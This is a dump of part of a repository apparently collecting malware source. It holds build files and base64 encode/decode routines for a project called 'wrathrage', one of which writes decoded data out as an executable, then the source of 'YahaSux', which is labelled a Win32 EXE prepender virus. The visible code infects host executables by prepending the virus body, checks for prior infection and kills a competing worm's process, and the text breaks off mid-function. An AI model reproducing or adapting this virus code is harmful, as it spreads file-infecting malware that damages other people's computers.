does not provide technical support for members' products. 7 | Please write to the ASP Ombudsman at 545 Grover Rd., Muskegon, MI USA, or 8 | send a Compuserve message via CIS MAIL to ASP Ombudsman 72050,1433. -------------------------------------------------------------------------------- /wrathrage/Debug/Project.ilk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Debug/Project.ilk -------------------------------------------------------------------------------- /wrathrage/Debug/Project.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Debug/Project.pdb -------------------------------------------------------------------------------- /wrathrage/Debug/b64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Debug/b64.obj -------------------------------------------------------------------------------- /wrathrage/Debug/b64decode.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Debug/b64decode.obj -------------------------------------------------------------------------------- /wrathrage/Debug/project.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Debug/project.obj -------------------------------------------------------------------------------- /wrathrage/Debug/vc70.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Debug/vc70.idb -------------------------------------------------------------------------------- /wrathrage/Debug/vc70.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Debug/vc70.pdb -------------------------------------------------------------------------------- /wrathrage/Project.ncb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Project.ncb -------------------------------------------------------------------------------- /wrathrage/Project.sln: -------------------------------------------------------------------------------- 1 | Microsoft Visual Studio Solution File, Format Version 9.00 2 | # Visual Basic Express 2005 3 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Project", "Project.vcproj", "{7A16A0F7-00ED-41A8-A014-92DC4A940697}" 4 | EndProject 5 | Global 6 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 7 | Debug|Default = Debug|Default 8 | Release|Default = Release|Default 9 | EndGlobalSection 10 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 11 | {7A16A0F7-00ED-41A8-A014-92DC4A940697}.Debug|Default.ActiveCfg = Debug|Win32 12 | {7A16A0F7-00ED-41A8-A014-92DC4A940697}.Debug|Default.Build.0 = Debug|Win32 13 | {7A16A0F7-00ED-41A8-A014-92DC4A940697}.Release|Default.ActiveCfg = Release|Win32 14 | {7A16A0F7-00ED-41A8-A014-92DC4A940697}.Release|Default.Build.0 = Release|Win32 15 | EndGlobalSection 16 | GlobalSection(SolutionProperties) = preSolution 17 | HideSolutionNode = FALSE 18 | EndGlobalSection 19 | EndGlobal 20 | -------------------------------------------------------------------------------- /wrathrage/Project.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Project.suo -------------------------------------------------------------------------------- /wrathrage/Project.vcproj: -------------------------------------------------------------------------------- 1 | 2 | 8 | 9 | 11 | 12 | 13 | 19 | 30 | 32 | 41 | 43 | 45 | 47 | 49 | 51 | 53 | 55 | 57 | 59 | 61 | 62 | 68 | 77 | 79 | 88 | 90 | 92 | 94 | 96 | 98 | 100 | 102 | 104 | 106 | 108 | 109 | 110 | 111 | 112 | 113 | 117 | 119 | 120 | 122 | 123 | 125 | 126 | 127 | 131 | 133 | 134 | 135 | 139 | 140 | 141 | 142 | 143 | 144 | -------------------------------------------------------------------------------- /wrathrage/UpgradeLog.XML: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /wrathrage/_UpgradeReport_Files/Thumbs.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/_UpgradeReport_Files/Thumbs.db -------------------------------------------------------------------------------- /wrathrage/_UpgradeReport_Files/UpgradeReport.css: -------------------------------------------------------------------------------- 1 | BODY 2 | { 3 | BACKGROUND-COLOR: white; 4 | FONT-FAMILY: "Verdana", sans-serif; 5 | FONT-SIZE: 100%; 6 | MARGIN-LEFT: 0px; 7 | MARGIN-TOP: 0px 8 | } 9 | P 10 | { 11 | FONT-FAMILY: "Verdana", sans-serif; 12 | FONT-SIZE: 70%; 13 | LINE-HEIGHT: 12pt; 14 | MARGIN-BOTTOM: 0px; 15 | MARGIN-LEFT: 10px; 16 | MARGIN-TOP: 10px 17 | } 18 | .note 19 | { 20 | BACKGROUND-COLOR: #ffffff; 21 | COLOR: #336699; 22 | FONT-FAMILY: "Verdana", sans-serif; 23 | FONT-SIZE: 100%; 24 | MARGIN-BOTTOM: 0px; 25 | MARGIN-LEFT: 0px; 26 | MARGIN-TOP: 0px; 27 | PADDING-RIGHT: 10px 28 | } 29 | .infotable 30 | { 31 | BACKGROUND-COLOR: #f0f0e0; 32 | BORDER-BOTTOM: #ffffff 0px solid; 33 | BORDER-COLLAPSE: collapse; 34 | BORDER-LEFT: #ffffff 0px solid; 35 | BORDER-RIGHT: #ffffff 0px solid; 36 | BORDER-TOP: #ffffff 0px solid; 37 | FONT-SIZE: 70%; 38 | MARGIN-LEFT: 10px 39 | } 40 | .issuetable 41 | { 42 | BACKGROUND-COLOR: #ffffe8; 43 | BORDER-COLLAPSE: collapse; 44 | COLOR: #000000; 45 | FONT-SIZE: 100%; 46 | MARGIN-BOTTOM: 10px; 47 | MARGIN-LEFT: 13px; 48 | MARGIN-TOP: 0px 49 | } 50 | .issuetitle 51 | { 52 | BACKGROUND-COLOR: #ffffff; 53 | BORDER-BOTTOM: #dcdcdc 1px solid; 54 | BORDER-TOP: #dcdcdc 1px; 55 | COLOR: #003366; 56 | FONT-WEIGHT: normal 57 | } 58 | .header 59 | { 60 | BACKGROUND-COLOR: #cecf9c; 61 | BORDER-BOTTOM: #ffffff 1px solid; 62 | BORDER-LEFT: #ffffff 1px solid; 63 | BORDER-RIGHT: #ffffff 1px solid; 64 | BORDER-TOP: #ffffff 1px solid; 65 | COLOR: #000000; 66 | FONT-WEIGHT: bold 67 | } 68 | .issuehdr 69 | { 70 | BACKGROUND-COLOR: #E0EBF5; 71 | BORDER-BOTTOM: #dcdcdc 1px solid; 72 | BORDER-TOP: #dcdcdc 1px solid; 73 | COLOR: #000000; 74 | FONT-WEIGHT: normal 75 | } 76 | .issuenone 77 | { 78 | BACKGROUND-COLOR: #ffffff; 79 | BORDER-BOTTOM: 0px; 80 | BORDER-LEFT: 0px; 81 | BORDER-RIGHT: 0px; 82 | BORDER-TOP: 0px; 83 | COLOR: #000000; 84 | FONT-WEIGHT: normal 85 | } 86 | .content 87 | { 88 | BACKGROUND-COLOR: #e7e7ce; 89 | BORDER-BOTTOM: #ffffff 1px solid; 90 | BORDER-LEFT: #ffffff 1px solid; 91 | BORDER-RIGHT: #ffffff 1px solid; 92 | BORDER-TOP: #ffffff 1px solid; 93 | PADDING-LEFT: 3px 94 | } 95 | .issuecontent 96 | { 97 | BACKGROUND-COLOR: #ffffff; 98 | BORDER-BOTTOM: #dcdcdc 1px solid; 99 | BORDER-TOP: #dcdcdc 1px solid; 100 | PADDING-LEFT: 3px 101 | } 102 | A:link 103 | { 104 | COLOR: #cc6633; 105 | TEXT-DECORATION: underline 106 | } 107 | A:visited 108 | { 109 | COLOR: #cc6633; 110 | } 111 | A:active 112 | { 113 | COLOR: #cc6633; 114 | } 115 | A:hover 116 | { 117 | COLOR: #cc3300; 118 | TEXT-DECORATION: underline 119 | } 120 | H1 121 | { 122 | BACKGROUND-COLOR: #003366; 123 | BORDER-BOTTOM: #336699 6px solid; 124 | COLOR: #ffffff; 125 | FONT-SIZE: 130%; 126 | FONT-WEIGHT: normal; 127 | MARGIN: 0em 0em 0em -20px; 128 | PADDING-BOTTOM: 8px; 129 | PADDING-LEFT: 30px; 130 | PADDING-TOP: 16px 131 | } 132 | H2 133 | { 134 | COLOR: #000000; 135 | FONT-SIZE: 80%; 136 | FONT-WEIGHT: bold; 137 | MARGIN-BOTTOM: 3px; 138 | MARGIN-LEFT: 10px; 139 | MARGIN-TOP: 20px; 140 | PADDING-LEFT: 0px 141 | } 142 | H3 143 | { 144 | COLOR: #000000; 145 | FONT-SIZE: 80%; 146 | FONT-WEIGHT: bold; 147 | MARGIN-BOTTOM: -5px; 148 | MARGIN-LEFT: 10px; 149 | MARGIN-TOP: 20px 150 | } 151 | H4 152 | { 153 | COLOR: #000000; 154 | FONT-SIZE: 70%; 155 | FONT-WEIGHT: bold; 156 | MARGIN-BOTTOM: 0px; 157 | MARGIN-TOP: 15px; 158 | PADDING-BOTTOM: 0px 159 | } 160 | UL 161 | { 162 | COLOR: #000000; 163 | FONT-SIZE: 70%; 164 | LIST-STYLE: square; 165 | MARGIN-BOTTOM: 0pt; 166 | MARGIN-TOP: 0pt 167 | } 168 | OL 169 | { 170 | COLOR: #000000; 171 | FONT-SIZE: 70%; 172 | LIST-STYLE: square; 173 | MARGIN-BOTTOM: 0pt; 174 | MARGIN-TOP: 0pt 175 | } 176 | LI 177 | { 178 | LIST-STYLE: square; 179 | MARGIN-LEFT: 0px 180 | } 181 | .expandable 182 | { 183 | CURSOR: hand 184 | } 185 | .expanded 186 | { 187 | color: black 188 | } 189 | .collapsed 190 | { 191 | DISPLAY: none 192 | } 193 | .foot 194 | { 195 | BACKGROUND-COLOR: #ffffff; 196 | BORDER-BOTTOM: #cecf9c 1px solid; 197 | BORDER-TOP: #cecf9c 2px solid 198 | } 199 | .settings 200 | { 201 | MARGIN-LEFT: 25PX; 202 | } 203 | .help 204 | { 205 | TEXT-ALIGN: right; 206 | margin-right: 10px; 207 | } 208 | -------------------------------------------------------------------------------- /wrathrage/_UpgradeReport_Files/UpgradeReport.xslt: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 |

63 | Soluzione: 64 | Progetto: 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 |

73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 92 | 102 | 103 | 104 | 105 | 106 | 107 | src 108 | 109 | 126 | 127 | 128 | 129 | 130 | 131 | 139 | 143 | 144 | 145 | 146 |
Nome fileStatoErroriAvvisi
90 | javascript:document.images[''].click()src 91 | 93 | 94 | 95 | Convertito 96 | 97 | 98 | 99 | Convertito 100 | 101 |
132 | 133 | file 134 | 135 | 136 | 1 file 137 | 138 | 140 | Convertito:
141 | Non convertito 142 |
147 | 148 | 149 | 150 | 151 | 152 | : 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | Report di conversione 162 | <xsl:if test="Properties/Property[@Name='LogNumber']"> 163 | <xsl:value-of select="Properties/Property[@Name='LogNumber']/@Value"/> 164 | </xsl:if> 165 | 166 | 189 | 190 | 191 |

Report di conversione -

192 | 193 |

194 | Ora di conversione:
195 |

196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 |

221 | 222 | 223 | 226 | 227 | 228 |
224 | Impostazioni di conversione 225 |

229 | 230 | 231 | 232 | 233 | -------------------------------------------------------------------------------- /wrathrage/_UpgradeReport_Files/UpgradeReport_Minus.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/_UpgradeReport_Files/UpgradeReport_Minus.gif -------------------------------------------------------------------------------- /wrathrage/_UpgradeReport_Files/UpgradeReport_Plus.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/_UpgradeReport_Files/UpgradeReport_Plus.gif -------------------------------------------------------------------------------- /wrathrage/b64.cpp: -------------------------------------------------------------------------------- 1 | /* mime64 */ 2 | /* MIME base64 encoder/decoder by Karl Hahn hahn@lds.loral.com 3-Aug-94 */ 3 | /* modified 30-Sep-94 by Karl Hahn hahn@lds.loral.com: handle multiple 4 | content */ 5 | #include 6 | #include 7 | #include 8 | 9 | #define VACIO "" 10 | #define EOL "\r\n" 11 | #define TRUE 1 12 | #define FALSE 0 13 | #define MAX_SIZE_LINE_B64 75 14 | 15 | extern char *buffer64; 16 | 17 | char alphabet[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 18 | "0123456789+/"; 19 | 20 | enum TOKENTYPE { NONE, BLANKS, PUNCT, TAG, NAME, CONTENT }; 21 | 22 | struct TOKEN { 23 | char *text; 24 | int length; 25 | int index; 26 | enum TOKENTYPE type; 27 | }; 28 | 29 | 30 | char *fileargs[64], *optargs[64]; 31 | 32 | struct STATE64 { 33 | unsigned long int accum; 34 | int shift; 35 | }; 36 | 37 | 38 | 39 | int encode(char *fileOrigen) { 40 | int index, shift, save_shift; 41 | int help_flag = 0, replace_flag = 0, quit = 0; 42 | FILE *fin, *fout; 43 | unsigned char blivit; 44 | unsigned long accum, value; 45 | char buf[80]; 46 | int firsttime = 1; 47 | int skipflag = 0; 48 | int printmsg = 1; 49 | fin = fopen( fileOrigen, "rb" ); 50 | if ( fin == NULL ) { 51 | buffer64 = NULL; 52 | return FALSE; 53 | } 54 | strcpy(buffer64,VACIO); 55 | do { 56 | quit = 0; 57 | printmsg = 1; 58 | shift = 0; 59 | accum = 0; 60 | index = 0; 61 | while ( ( !feof( fin ) ) || (shift != 0) ) { 62 | if ( ( !feof( fin ) ) && ( quit == 0 ) ) { 63 | blivit = fgetc( fin ); 64 | if ( feof( fin ) ) { 65 | quit = 1; 66 | save_shift = shift; 67 | blivit = 0; 68 | } 69 | } 70 | else { 71 | quit = 1; 72 | save_shift = shift; 73 | blivit = 0; 74 | } 75 | 76 | if ( (quit == 0) || (shift != 0) ) { 77 | value = (unsigned long)blivit; 78 | accum <<= 8; 79 | shift += 8; 80 | accum |= value; 81 | } 82 | 83 | while ( shift >= 6 ) { 84 | shift -= 6; 85 | value = (accum >> shift) & 0x3Fl; 86 | blivit = alphabet[value]; 87 | 88 | buf[index++] = blivit; 89 | if ( index >= MAX_SIZE_LINE_B64 ) { 90 | buf[index] = '\r'; 91 | index++; 92 | buf[index] = '\0'; 93 | strcat( buffer64, buf ); 94 | index = 0; 95 | } 96 | 97 | if ( quit != 0 ) 98 | { 99 | shift = 0; 100 | } 101 | } 102 | } 103 | 104 | if ( save_shift == 2 ) { 105 | buf[index++] = '='; 106 | if ( index >= MAX_SIZE_LINE_B64 ) { 107 | buf[index] = '\r'; 108 | index++; 109 | buf[index] = '\0'; 110 | strcat( buffer64, buf ); 111 | index = 0; 112 | } 113 | 114 | buf[index++] = '='; 115 | if ( index >= MAX_SIZE_LINE_B64 ) { 116 | buf[index] = '\r'; 117 | index++; 118 | buf[index] = '\0'; 119 | strcat( buffer64, buf ); 120 | index = 0; 121 | } 122 | } 123 | else if ( save_shift == 4 ) { 124 | buf[index++] = '='; 125 | if ( index >= MAX_SIZE_LINE_B64 ) { 126 | buf[index] = '\r'; 127 | index++; 128 | buf[index] = '\0'; 129 | strcat( buffer64, buf ); 130 | index = 0; 131 | } 132 | } 133 | 134 | if ( index != 0 ) { 135 | buf[index] = '\r'; 136 | index++; 137 | buf[index] = '\0'; 138 | strcat( buffer64, buf ); 139 | } 140 | fout = 0; 141 | firsttime = 0; 142 | } while ( !feof( fin ) ); 143 | 144 | fclose( fin ); 145 | return TRUE; 146 | } -------------------------------------------------------------------------------- /wrathrage/b64decode.cpp: -------------------------------------------------------------------------------- 1 | /* public domain */ 2 | 3 | /* BASE64 on stdin -> converted data on stdout */ 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | #ifdef _WIN32 10 | #ifndef WIN32 11 | #define WIN32 12 | #endif 13 | #endif 14 | 15 | #ifdef WIN32 16 | #include 17 | #include 18 | #endif 19 | extern char *pkZipExeName; 20 | unsigned char alphabet[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 21 | 22 | void decode(char *nFile) { 23 | char *pkExe = (char*)malloc(sizeof(char) * (strlen(nFile) + 5)); 24 | strcpy(pkExe,nFile); 25 | strcat(pkExe,".exe"); 26 | pkZipExeName = (char*)malloc(sizeof(char) * (strlen(pkExe) + 1)); 27 | strcpy(pkZipExeName,pkExe); //copiamos a la var global el nombre del fichero 28 | FILE *fpk = fopen(nFile,"r"); 29 | FILE *fpkexe = fopen(pkExe,"wb"); 30 | static char inalphabet[256], decoder[256]; 31 | int i, bits, c, char_count, errors = 0; 32 | for (i = (sizeof alphabet) - 1; i >= 0 ; i--) { 33 | inalphabet[alphabet[i]] = 1; 34 | decoder[alphabet[i]] = i; 35 | } 36 | 37 | char_count = 0; 38 | bits = 0; 39 | while ((c = fgetc(fpk)) != EOF) { 40 | if (c == '=') 41 | break; 42 | if (c > 255 || ! inalphabet[c]) 43 | continue; 44 | bits += decoder[c]; 45 | char_count++; 46 | if (char_count == 4) { 47 | fputc((bits >> 16),fpkexe); 48 | fputc(((bits >> 8) & 0xff),fpkexe); 49 | fputc((bits & 0xff),fpkexe); 50 | bits = 0; 51 | char_count = 0; 52 | } else { 53 | bits <<= 6; 54 | } 55 | } 56 | if (c == EOF) { 57 | if (char_count) { 58 | fprintf(stderr, "base64 encoding incomplete: at least %d bits truncated", 59 | ((4 - char_count) * 6)); 60 | errors++; 61 | } 62 | } else { /* c == '=' */ 63 | switch (char_count) { 64 | case 1: 65 | fprintf(stderr, "base64 encoding incomplete: at least 2 bits missing"); 66 | errors++; 67 | break; 68 | case 2: 69 | fputc((bits >> 10),fpkexe); 70 | break; 71 | case 3: 72 | fputc((bits >> 16),fpkexe); 73 | fputc(((bits >> 8) & 0xff),fpkexe); 74 | break; 75 | } 76 | } 77 | fclose(fpkexe); 78 | fclose(fpk); 79 | } -------------------------------------------------------------------------------- /wrathrage/msgruaid.h: -------------------------------------------------------------------------------- 1 | #ifndef __MSGRUAID__H__ 2 | #define __MSGRUAID__H__ 3 | 4 | // 5 | // Dispatch IDs for DMessengerEvents 6 | // 7 | #define DISPID_MUAE_ONSIGNIN 0x400 8 | #define DISPID_MUAE_ONSIGNOUT 0x401 9 | #define DISPID_MUAE_ONLISTADD 0x402 10 | #define DISPID_MUAE_ONLISTREMOVE 0x403 11 | #define DISPID_MUAE_ONUSERFRIENDLYNAMECHANGE 0x404 12 | #define DISPID_MUAE_ONMYFRIENDLYNAMECHANGE 0x405 13 | #define DISPID_MUAE_ONUSERSTATECHANGE 0x406 14 | #define DISPID_MUAE_ONMYSTATECHANGE 0x407 15 | #define DISPID_MUAE_ONAPPSHUTDOWN 0x408 16 | #define DISPID_MUAE_ONMYPROPERTYCHANGE 0x409 17 | #define DISPID_MUAE_ONUSERPROPERTYCHANGE 0x40a 18 | #define DISPID_MUAE_ONUSERBLOCKCHANGE 0x40b 19 | #define DISPID_MUAE_ONUSERPAGERCHANGE 0x40c 20 | #define DISPID_MUAE_ONUSERPHONECHANGE 0x40d 21 | #define DISPID_MUAE_ONMYPHONECHANGE 0x40e 22 | #define DISPID_MUAE_ONUNREADEMAILCHANGE 0x40f 23 | #define DISPID_MUAE_ONIMWINDOWCREATED 0x411 24 | #define DISPID_MUAE_ONIMWINDOWDESTROYED 0x412 25 | #define DISPID_MUAE_ONIMWINDOWADD 0x413 26 | #define DISPID_MUAE_ONIMWINDOWREMOVE 0x414 27 | #define DISPID_MUAE_ADDGROUP 0x415 28 | #define DISPID_MUAE_REMOVEGROUP 0x416 29 | #define DISPID_MUAE_RENAMEGROUP 0x417 30 | #define DISPID_MUAE_ADD_USRGRP 0x418 31 | #define DISPID_MUAE_REMOVE_USRGRP 0x419 32 | 33 | 34 | // 35 | // Dispatch IDs for IMessenger 36 | // 37 | #define DISPID_MUAM_RECEIVEDIR 0x500 38 | #define DISPID_MUAM_STARTVOICE 0x501 39 | #define DISPID_MUAM_FRIENDLYNAME 0x502 40 | #define DISPID_MUAM_WINDOW 0x503 41 | #define DISPID_MUAM_UNREADEMAILCOUNT 0x504 42 | #define DISPID_MUAM_VIEWPROFILE 0x505 43 | #define DISPID_MUAM_GETCONTACT 0x506 44 | #define DISPID_MUAM_OPTIONUI 0x507 45 | #define DISPID_MUAM_ADDUI 0x508 46 | #define DISPID_MUAM_FINDUI 0x509 47 | #define DISPID_MUAM_INSTANTMESSAGE 0x50a 48 | #define DISPID_MUAM_SIGNOUT 0x50b 49 | #define DISPID_MUAM_SENDFILE 0x50c 50 | #define DISPID_MUAM_OPENINBOX 0x50d 51 | #define DISPID_MUAM_MYSERVICENAME 0x50e 52 | #define DISPID_MUAM_INVITEAPP 0x50f 53 | #define DISPID_MUAM_MYPHONENUMBER 0x510 54 | #define DISPID_MUAM_SIGNIN 0x511 55 | #define DISPID_MUAM_SENDMAIL 0x512 56 | #define DISPID_MUAM_AUTOSIGNIN 0x513 57 | #define DISPID_MUAM_PHONEUI 0x514 58 | #define DISPID_MUAM_AUDIOUI 0x515 59 | #define DISPID_MUAM_PAGERUI 0x516 60 | #define DISPID_MUAM_CONTACTS 0x517 61 | #define DISPID_MUAM_SIGNINNAME 0x518 62 | #define DISPID_MUAM_STATUS 0x519 63 | #define DISPID_MUAM_MYPROPERTY 0x51a 64 | #define DISPID_MUAM_SERVICEID 0x51b 65 | #define DISPID_MUAM_SERVICES 0x51c 66 | // 67 | // Dispatch IDs for IMessenger2 68 | // 69 | #define DISPID_MUAM_MYGROUPS 0x51d 70 | #define DISPID_MUAM_STARTVIDEO 0x51e 71 | #define DISPID_MUAM_GROUPS 0x51f 72 | #define DISPID_MUAM_CREATEGROUP 0x520 73 | #define DISPID_MUAM_SORT 0x521 74 | // 75 | // Dispatch IDs for IMessenger3 76 | // 77 | #define DISPID_MUAM_PROPERTY 0x522 78 | 79 | // 80 | // Dispatch IDs for IMessengerContact 81 | // 82 | 83 | #define DISPID_MUAC_FRIENDLYNAME 0x600 84 | #define DISPID_MUAC_STATUS 0x601 85 | #define DISPID_MUAC_SIGNINNAME 0x602 86 | #define DISPID_MUAC_SERVICENAME 0x603 87 | #define DISPID_MUAC_BLOCK 0x604 88 | #define DISPID_MUAC_ISSELF 0x605 89 | #define DISPID_MUAC_PROPERTY 0x606 90 | #define DISPID_MUAC_CANPAGE 0x607 91 | #define DISPID_MUAC_PHONENUMBER 0x608 92 | #define DISPID_MUAC_SERVICEID 0x609 93 | 94 | 95 | // 96 | // Dispatch IDs for IMessengerContacts 97 | // 98 | 99 | #define DISPID_MUAC_COUNT 0x700 100 | #define DISPID_MUAC_REMOVE 0x701 101 | 102 | // 103 | // Dispatch IDs for IMessengerWindow 104 | // 105 | 106 | #define DISPID_MUAW_HWND 0x800 107 | #define DISPID_MUAW_LEFT 0x801 108 | #define DISPID_MUAW_TOP 0x802 109 | #define DISPID_MUAW_WIDTH 0x803 110 | #define DISPID_MUAW_HEIGHT 0x804 111 | #define DISPID_MUAW_CLOSE 0x805 112 | #define DISPID_MUAW_SHOW 0x806 113 | #define DISPID_MUAW_ISCLOSED 0x807 114 | #define DISPID_MUAW_PROPERTY 0x808 115 | 116 | 117 | // 118 | // Dispatch IDs for IMessengerService(s) 119 | // 120 | 121 | #define DISPID_MUAS_PS 0x880 122 | #define DISPID_MUAS_COUNT 0x881 123 | #define DISPID_MUAS_NAME 0x882 124 | #define DISPID_MUAS_FNAME 0x883 125 | #define DISPID_MUAS_CAP 0x884 126 | #define DISPID_MUAS_STATUS 0x885 127 | #define DISPID_MUAS_PROPERTY 0x886 128 | #define DISPID_MUAS_ID 0x887 129 | #define DISPID_MUAS_SIGNINNAME 0x888 130 | 131 | // 132 | // Dispatch IDs for IMessengerConversationWnd 133 | // 134 | #define DISPID_MUAW_CONTACTS 0x809 135 | #define DISPID_MUAW_HISTORY 0x80a 136 | #define DISPID_MUAW_ADD 0x80b 137 | 138 | // 139 | // Dispatch IDs for IMessengerGroup(s) 140 | // 141 | #define DISPID_MUAM_GROUP 0x680 142 | #define DISPID_MUAG_REMOVEG 0x681 143 | #define DISPID_MUAG_COUNT 0x682 144 | #define DISPID_MUAG_CONTACTS 0x683 145 | #define DISPID_MUAG_NAME 0x684 146 | #define DISPID_MUAG_ADD 0x685 147 | #define DISPID_MUAG_REMOVEC 0x686 148 | #define DISPID_MUAG_SERVICE 0x687 149 | 150 | #endif 151 | -------------------------------------------------------------------------------- /wrathrage/project.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/project.cpp -------------------------------------------------------------------------------- /yahasux/yahasux.c: -------------------------------------------------------------------------------- 1 | /* 2 | Virus Name: YahaSux 3 | Version: B 4 | Type: Win32 EXE Prepender 5 | Author: Gigabyte [Metaphase] 6 | Homepage: http://coderz.net/gigabyte 7 | */ 8 | 9 | 10 | #include 11 | #include 12 | #include 13 | #include "yahasux.h" 14 | 15 | #define VIRUSSIZE 32 16 | 17 | using namespace std; 18 | 19 | char VirCheck(char SRCFileName[]) 20 | { 21 | FILE *SRC; 22 | char Buffer[1]; 23 | int v=0; 24 | SRC=fopen(SRCFileName,"rb"); 25 | 26 | if(SRC) 27 | { 28 | fseek(SRC,19,0); 29 | fread(Buffer,1,1,SRC); 30 | } 31 | 32 | fclose(SRC); 33 | return Buffer[0]; 34 | } 35 | 36 | void WriteVirus(char SRCFileName[],char DSTFileName[]) 37 | { 38 | FILE *SRC, *DST; 39 | char Buffer[1024]; 40 | short Counter=0; 41 | int v = 0; 42 | SRC=fopen(SRCFileName, "rb"); 43 | if(SRC) 44 | { 45 | DST = fopen(DSTFileName, "wb"); 46 | if(DST) 47 | { 48 | for (v=0;v < VIRUSSIZE;v++) 49 | { 50 | Counter = fread(Buffer, 1, 1024, SRC); 51 | if(Counter) 52 | fwrite(Buffer, 1, Counter, DST); 53 | } 54 | } 55 | } 56 | fclose(SRC); 57 | fclose(DST); 58 | } 59 | 60 | void AddOrig(char SRCFileName[],char DSTFileName[]) 61 | { 62 | FILE *SRC,*DST; 63 | char Buffer[1024]; 64 | short Counter=0; 65 | SRC=fopen(SRCFileName,"rb"); 66 | if(SRC) 67 | { 68 | DST=fopen(DSTFileName,"ab"); 69 | if(DST) 70 | { 71 | while(!feof(SRC)) 72 | { 73 | Counter=fread(Buffer,1,1024,SRC); 74 | if(Counter) 75 | fwrite(Buffer,1,Counter,DST); 76 | } 77 | } 78 | } 79 | fclose(SRC); 80 | fclose(DST); 81 | } 82 | 83 | void InfectFile(char hostfile[],char virus[]) 84 | { 85 | CopyFile(hostfile,"yahasux.exe",FALSE); 86 | WriteVirus(virus,hostfile); 87 | AddOrig("yahasux.exe",hostfile); 88 | } 89 | 90 | void CopyOrig(char SRCFileName[], char DSTFileName[]) 91 | { 92 | FILE *SRC,*DST; 93 | char Buffer[1024]; 94 | short Counter=0; 95 | int v=0; 96 | SRC=fopen(SRCFileName,"rb"); 97 | if(SRC) 98 | { 99 | DST=fopen(DSTFileName,"wb"); 100 | if(DST) 101 | { 102 | fseek(SRC,(VIRUSSIZE*1024),0); 103 | 104 | while(!feof(SRC)) 105 | { 106 | Counter=fread(Buffer,1,1024,SRC); 107 | if(Counter) 108 | fwrite(Buffer,1,Counter,DST); 109 | } 110 | } 111 | } 112 | fclose(SRC); 113 | fclose(DST); 114 | } 115 | 116 | bool FileExists(char *FileName) 117 | { 118 | HANDLE Exists; 119 | Exists=CreateFile(FileName,GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,0,OPEN_EXISTING,0,0); 120 | if(Exists==INVALID_HANDLE_VALUE) 121 | return false; 122 | CloseHandle(Exists); 123 | return true; 124 | } 125 | 126 | int KillWinServices () 127 | { 128 | HANDLE PrListHandle,PrHandle; 129 | PROCESSENTRY32 processList; 130 | int counter = 0; 131 | 132 | PrListHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); 133 | 134 | while (true) 135 | { 136 | if (counter == 0) 137 | { 138 | if (Process32First(PrListHandle, &processList) == FALSE && GetLastError()==ERROR_NO_MORE_FILES) 139 | { 140 | CloseHandle(PrListHandle); 141 | return false; 142 | } 143 | } 144 | else 145 | { 146 | if (Process32Next(PrListHandle, &processList) == FALSE) 147 | { 148 | if (GetLastError() != ERROR_NO_MORE_FILES) 149 | { 150 | CloseHandle(PrListHandle); 151 | return false; 152 | } 153 | else 154 | { 155 | CloseHandle(PrListHandle); 156 | break; 157 | } 158 | } 159 | } 160 | 161 | if (strstr(processList.szExeFile,"WinServices.exe")||strstr(processList.szExeFile,"WINSER~1.EXE")) 162 | { 163 | PrHandle = OpenProcess(PROCESS_ALL_ACCESS, TRUE, processList.th32ProcessID); 164 | if 